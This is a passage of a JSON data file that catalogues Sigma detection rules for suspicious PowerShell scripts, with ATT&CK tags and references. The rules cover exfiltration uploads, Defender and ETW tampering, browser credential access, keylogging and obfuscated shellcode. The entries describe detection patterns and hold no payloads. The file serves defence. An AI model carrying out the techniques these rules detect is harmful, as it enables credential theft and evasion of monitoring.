"8bc063d5-3a3a-4f01-a140-bc15e55e8437", "value": "Suspicious GetTypeFromCLSID ShellExecute" }, { "description": "Detects PowerShell scripts leveraging the \"Invoke-WebRequest\" cmdlet to send data via either \"PUT\" or \"POST\" method.", "meta": { "author": "frack113", "creation_date": "2022-01-07", "falsepositive": [ "Unknown" ], "filename": "posh_ps_script_with_upload_capabilities.yml", "level": "low", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.4", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1020/T1020.md", "https://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_script_with_upload_capabilities.yml" ], "tags": [ "attack.exfiltration", "attack.t1020" ] }, "related": [ { "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d2e3f2f6-7e09-4bf2-bc5d-90186809e7fb", "value": "PowerShell Script With File Upload Capabilities" }, { "description": "Detects usage of the built-in PowerShell cmdlet \"Enable-WindowsOptionalFeature\" used as a Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", "meta": { "author": "frack113", "creation_date": "2022-09-10", "falsepositive": [ "Legitimate usage of the features listed in the rule." ], "filename": "posh_ps_enable_susp_windows_optional_feature.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system", "https://learn.microsoft.com/en-us/windows/wsl/install-on-server", "https://learn.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enable_susp_windows_optional_feature.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "55c925c1-7195-426b-a136-a9396800e29b", "value": "Potential Suspicious Windows Feature Enabled" }, { "description": "Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class", "meta": { "author": "frack113", "creation_date": "2022-04-24", "falsepositive": [ "Unknown" ], "filename": "posh_ps_win32_product_install_msi.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_win32_product_install_msi.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.007" ] }, "related": [ { "dest-uuid": "365be77f-fc0e-42ee-bac8-4faf806d9336", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "91109523-17f0-4248-a800-f81d9e7c081d", "value": "PowerShell WMI Win32_Product Install MSI" }, { "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.", "meta": { "author": "frack113", "creation_date": "2022-01-07", "falsepositive": [ "Legitimate script" ], "filename": "posh_ps_invoke_command_remote.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-2---invoke-command", "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/invoke-command?view=powershell-7.4", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_command_remote.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.006" ] }, "related": [ { "dest-uuid": "60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7b836d7f-179c-4ba4-90a7-a7e60afb48e6", "value": "Execute Invoke-command on Remote Host" }, { "description": "Detect use of Get-GPO to get one GPO or all the GPOs in a domain.", "meta": { "author": "frack113", "creation_date": "2022-06-04", "falsepositive": [ "Legitimate PowerShell scripts" ], "filename": "posh_ps_susp_get_gpo.yml", "level": "low", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/grouppolicy/get-gpo?view=windowsserver2022-ps", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_gpo.yml" ], "tags": [ "attack.discovery", "attack.t1615" ] }, "related": [ { "dest-uuid": "1b20efbf-8063-4fc3-a07d-b575318a301b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "eb2fd349-ec67-4caa-9143-d79c7fb34441", "value": "Suspicious GPO Discovery With Get-GPO" }, { "description": "Adversaries may target user email on local systems to collect sensitive information.\nFiles containing email data can be acquired from a users local system, such as Outlook storage or cache files.\n", "meta": { "author": "frack113", "creation_date": "2021-07-21", "falsepositive": [ "Unknown" ], "filename": "posh_ps_susp_mail_acces.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1114.001/T1114.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_mail_acces.yml" ], "tags": [ "attack.collection", "attack.t1114.001" ] }, "related": [ { "dest-uuid": "1e9eb839-294b-48cc-b0d3-c45555a2a004", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2837e152-93c8-43d2-85ba-c3cd3c2ae614", "value": "Powershell Local Email Collection" }, { "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data", "meta": { "author": "frack113", "creation_date": "2021-07-30", "falsepositive": [ "Unknown" ], "filename": "posh_ps_susp_recon_export.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_recon_export.yml" ], "tags": [ "attack.collection", "attack.t1119" ] }, "related": [ { "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a9723fcc-881c-424c-8709-fd61442ab3c3", "value": "Recon Information for Export with PowerShell" }, { "description": "Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", "meta": { "author": "frack113", "creation_date": "2022-09-10", "falsepositive": [ "Unknown" ], "filename": "posh_ps_disable_windows_optional_feature.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/5b67c9b141fa3918017f8fa44f2f88f0b1ecb9e1/atomics/T1562.001/T1562.001.md", "https://learn.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_disable_windows_optional_feature.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "99c4658d-2c5e-4d87-828d-7c066ca537c3", "value": "Disable-WindowsOptionalFeature Command PowerShell" }, { "description": "Detects PowerShell module creation where the module Contents are set to \"function Get-VMRemoteFXPhysicalVideoAdapter\". This could be a sign of potential abuse of the \"RemoteFXvGPUDisablement.exe\" binary which is known to be vulnerable to module load-order hijacking.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-09", "falsepositive": [ "Unknown" ], "filename": "posh_ps_remotefxvgpudisablement_abuse.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_remotefxvgpudisablement_abuse.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cacef8fc-9d3d-41f7-956d-455c6e881bc5", "value": "Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell ScriptBlock" }, { "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments.\nThis may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox\n", "meta": { "author": "frack113, Duc.Le-GTSC", "creation_date": "2021-08-03", "falsepositive": [ "Unknown" ], "filename": "posh_ps_detect_vm_env.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1497.001/T1497.001.md", "https://techgenix.com/malicious-powershell-scripts-evade-detection/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_detect_vm_env.yml" ], "tags": [ "attack.defense-evasion", "attack.t1497.001" ] }, "related": [ { "dest-uuid": "29be378d-262d-4e99-b00d-852d573628e6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d93129cd-1ee0-479f-bc03-ca6f129882e3", "value": "Powershell Detect Virtualization Environment" }, { "description": "Detects Obfuscated Powershell via Stdin in Scripts", "meta": { "author": "Nikita Nazarov, oscd.community", "creation_date": "2020-10-12", "falsepositive": [ "Unknown" ], "filename": "posh_ps_invoke_obfuscation_via_stdin.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_stdin.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "86b896ba-ffa1-4fea-83e3-ee28a4c915c7", "value": "Invoke-Obfuscation Via Stdin - Powershell" }, { "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", "meta": { "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-23", "falsepositive": [ "Legitimate use of the library for administrative activity" ], "filename": "posh_ps_aadinternals_cmdlets_execution.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/Gerenios/AADInternals", "https://o365blog.com/aadinternals/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_aadinternals_cmdlets_execution.yml" ], "tags": [ "attack.execution", "attack.reconnaissance", "attack.discovery", "attack.credential-access", "attack.impact" ] }, "uuid": "91e69562-2426-42ce-a647-711b8152ced6", "value": "AADInternals PowerShell Cmdlets Execution - PsScript" }, { "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", "meta": { "author": "frack113", "creation_date": "2022-12-27", "falsepositive": [ "Unknown" ], "filename": "posh_ps_token_obfuscation.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/danielbohannon/Invoke-Obfuscation", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_token_obfuscation.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027.009" ] }, "related": [ { "dest-uuid": "0533ab23-3f7d-463f-9bd8-634d27e4dee1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f3a98ce4-6164-4dd4-867c-4d83de7eca51", "value": "Powershell Token Obfuscation - Powershell" }, { "description": "Get the processes that are running on the local computer.", "meta": { "author": "frack113", "creation_date": "2022-03-17", "falsepositive": [ "Legitimate PowerShell scripts" ], "filename": "posh_ps_susp_get_process.yml", "level": "low", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-process?view=powershell-7.4", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-3---process-discovery---get-process", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_process.yml" ], "tags": [ "attack.discovery", "attack.t1057" ] }, "related": [ { "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "af4c87ce-bdda-4215-b998-15220772e993", "value": "Suspicious Process Discovery With Get-Process" }, { "description": "Detects scripts or commands that disabled the Powershell command history by removing psreadline module", "meta": { "author": "Ali Alwashali", "creation_date": "2022-08-21", "falsepositive": [ "Legitimate script that disables the command history" ], "filename": "posh_ps_disable_psreadline_command_history.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://twitter.com/DissectMalware/status/1062879286749773824", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_disable_psreadline_command_history.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.003" ] }, "related": [ { "dest-uuid": "3aef9463-9a7a-43ba-8957-a867e07c1e6a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "602f5669-6927-4688-84db-0d4b7afb2150", "value": "Disable Powershell Command History" }, { "description": "An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users.\nThis may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper\n", "meta": { "author": "frack113", "creation_date": "2021-12-26", "falsepositive": [ "Unknown" ], "filename": "posh_ps_susp_wallpaper.yml", "level": "low", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1491.001/T1491.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_wallpaper.yml" ], "tags": [ "attack.impact", "attack.t1491.001" ] }, "related": [ { "dest-uuid": "8c41090b-aa47-4331-986b-8c9a51a91103", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c5ac6a1e-9407-45f5-a0ce-ca9a0806a287", "value": "Replace Desktop Wallpaper by Powershell" }, { "description": "Detects Base64 encoded Shellcode", "meta": { "author": "David Ledbetter (shellcode), Florian Roth (Nextron Systems)", "creation_date": "2018-11-17", "falsepositive": [ "Unknown" ], "filename": "posh_ps_shellcode_b64.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://twitter.com/cyb3rops/status/1063072865992523776", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_shellcode_b64.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1055", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", "value": "PowerShell ShellCode" }, { "description": "Detects the use of PSAttack PowerShell hack tool", "meta": { "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "creation_date": "2017-03-05", "falsepositive": [ "Unknown" ], "filename": "posh_ps_psattack.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://adsecurity.org/?p=2921", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_psattack.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", "value": "PowerShell PSAttack" }, { "description": "Detects usage of the WMI class \"Win32_NTEventlogFile\" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-07-13", "falsepositive": [ "Legitimate administration and backup scripts" ], "filename": "posh_ps_win32_nteventlogfile_usage.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa394225(v=vs.85)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_win32_nteventlogfile_usage.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "e2812b49-bae0-4b21-b366-7c142eafcde2", "value": "Potentially Suspicious Call To Win32_NTEventlogFile Class - PSScript" }, { "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n", "meta": { "author": "frack113, MatilJ", "creation_date": "2022-01-19", "falsepositive": [ "Legitimate administrative script" ], "filename": "posh_ps_msxml_com.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/desktop/ms766431(v=vs.85)", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-7---powershell-msxml-com-object---with-prompt", "https://www.trendmicro.com/en_id/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_msxml_com.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "78aa1347-1517-4454-9982-b338d6df8343", "value": "Powershell MsXml COM Object" }, { "description": "Detects usage of powershell cmdlets to disable or remove ETW trace sessions", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-28", "falsepositive": [ "Unknown" ], "filename": "posh_ps_etw_trace_evasion.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_etw_trace_evasion.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070", "attack.t1562.006", "car.2016-04-002" ] }, "related": [ { "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "74d2a63f-3c7b-4852-92da-02d8fbab16da", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "115fdba9-f017-42e6-84cf-d5573bf2ddf8", "value": "Disable of ETW Trace - Powershell" }, { "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\nOffice add-ins can be used to add functionality to Office programs\n", "meta": { "author": "frack113", "creation_date": "2021-12-28", "falsepositive": [ "Unknown" ], "filename": "posh_ps_office_comobject_registerxll.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137.006/T1137.006.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_office_comobject_registerxll.yml" ], "tags": [ "attack.persistence", "attack.t1137.006" ] }, "related": [ { "dest-uuid": "34f1d81d-fe88-4f97-bd3b-a3164536255d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", "value": "Code Executed Via Office Add-in XLL File" }, { "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", "meta": { "author": "frack113", "creation_date": "2021-12-12", "falsepositive": [ "Unknown" ], "filename": "posh_ps_susp_local_group_reco.yml", "level": "low", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_local_group_reco.yml" ], "tags": [ "attack.discovery", "attack.t1069.001" ] }, "related": [ { "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fa6a5a45-3ee2-4529-aa14-ee5edc9e29cb", "value": "Suspicious Get Local Groups Information - PowerShell" }, { "description": "Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.", "meta": { "author": "frack113", "creation_date": "2021-09-02", "falsepositive": [ "Unknown" ], "filename": "posh_ps_store_file_in_alternate_data_stream.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_store_file_in_alternate_data_stream.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.004" ] }, "related": [ { "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a699b30e-d010-46c8-bbd1-ee2e26765fe9", "value": "Powershell Store File In Alternate Data Stream" }, { "description": "Powershell use PassThru option to start in background", "meta": { "author": "frack113", "creation_date": "2022-01-15", "falsepositive": [ "Legitimate PowerShell scripts" ], "filename": "posh_ps_susp_start_process.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Start-Process?view=powershell-5.1&viewFallbackFrom=powershell-7", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.003/T1036.003.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_start_process.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036.003" ] }, "related": [ { "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0718cd72-f316-4aa2-988f-838ea8533277", "value": "Suspicious Start-Process PassThru" }, { "description": "Detects PowerShell scripts attempting to disable scheduled scanning and other parts of Windows Defender ATP or set default actions to allow.", "meta": { "author": "frack113, elhoim, Tim Shelton (fps, alias support), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-01-16", "falsepositive": [ "Legitimate PowerShell scripts that disable Windows Defender for troubleshooting purposes. Must be investigated." ], "filename": "posh_ps_tamper_windows_defender_set_mp.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://learn.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps", "https://bidouillesecurity.com/disable-windows-defender-in-powershell/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_tamper_windows_defender_set_mp.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "14c71865-6cd3-44ae-adaa-1db923fae5f2", "value": "Tamper Windows Defender - ScriptBlockLogging" }, { "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.\n", "meta": { "author": "frack113", "creation_date": "2022-01-30", "falsepositive": [ "Unknown" ], "filename": "posh_ps_access_to_browser_login_data.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_access_to_browser_login_data.yml" ], "tags": [ "attack.credential-access", "attack.t1555.003" ] }, "related": [ { "dest-uuid": "58a3e6aa-4453-4cc8-a51f-4befe80b31a8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fc028194-969d-4122-8abe-0470d5b8f12f", "value": "Access to Browser Login Data" }, { "description": "Detects PowerShell scripts that contains reference to keystroke capturing functions", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-04", "falsepositive": [ "Unknown" ], "filename": "posh_ps_susp_keylogger_activity.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://www.virustotal.com/gui/file/720a7ee9f2178c70501d7e3f4bcc28a4f456e200486dbd401b25af6da3b4da62/content", "https://www.virustotal.com/gui/file/d4486b63512755316625230e0c9c81655093be93876e0d80732e7eeaf7d83476/content", "https://learn.microsoft.com/en-us/dotnet/api/system.windows.input.keyboard.iskeydown?view=windowsdesktop-7.0", "https://twitter.com/ScumBots/status/1610626724257046529", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_keylogger_activity.yml" ], "tags": [ "attack.collection", "attack.credential-access", "attack.t1056.001" ] }, "related": [ { "dest-uuid": "09a60ea3-a8d1-4ae5-976e-5783248b72a4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "965e2db9-eddb-4cf6-a986-7a967df651e4", "value": "Potential Keylogger Activity" }, { "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", "meta": { "author": "frack113", "creation_date": "2022-02-01", "falsepositive": [ "Legitimate PowerShell scripts" ], "filename": "posh_ps_run_from_mount_diskimage.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-2---mount-an-iso-image-and-run-executable-from-the-iso", "https://learn.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_run_from_mount_diskimage.yml" ], "tags": [ "attack.defense-evasion", "attack.t1553.005" ] }, "related": [ { "dest-uuid": "7e7c2fba-7cca-486c-9582-4c1bb2851961", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "902cedee-0398-4e3a-8183-6f3a89773a96", "value": "Suspicious Invoke-Item From Mount-DiskImage" }, { "description": "Adversaries may attempt to find domain-level groups and permission settings.\nThe knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as domain administrators.\n", "meta": { "author": "frack113", "creation_date": "2021-12-15", "falsepositive": [ "Unknown" ], "filename": "posh_ps_susp_ad_group_reco.yml", "level": "low", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ 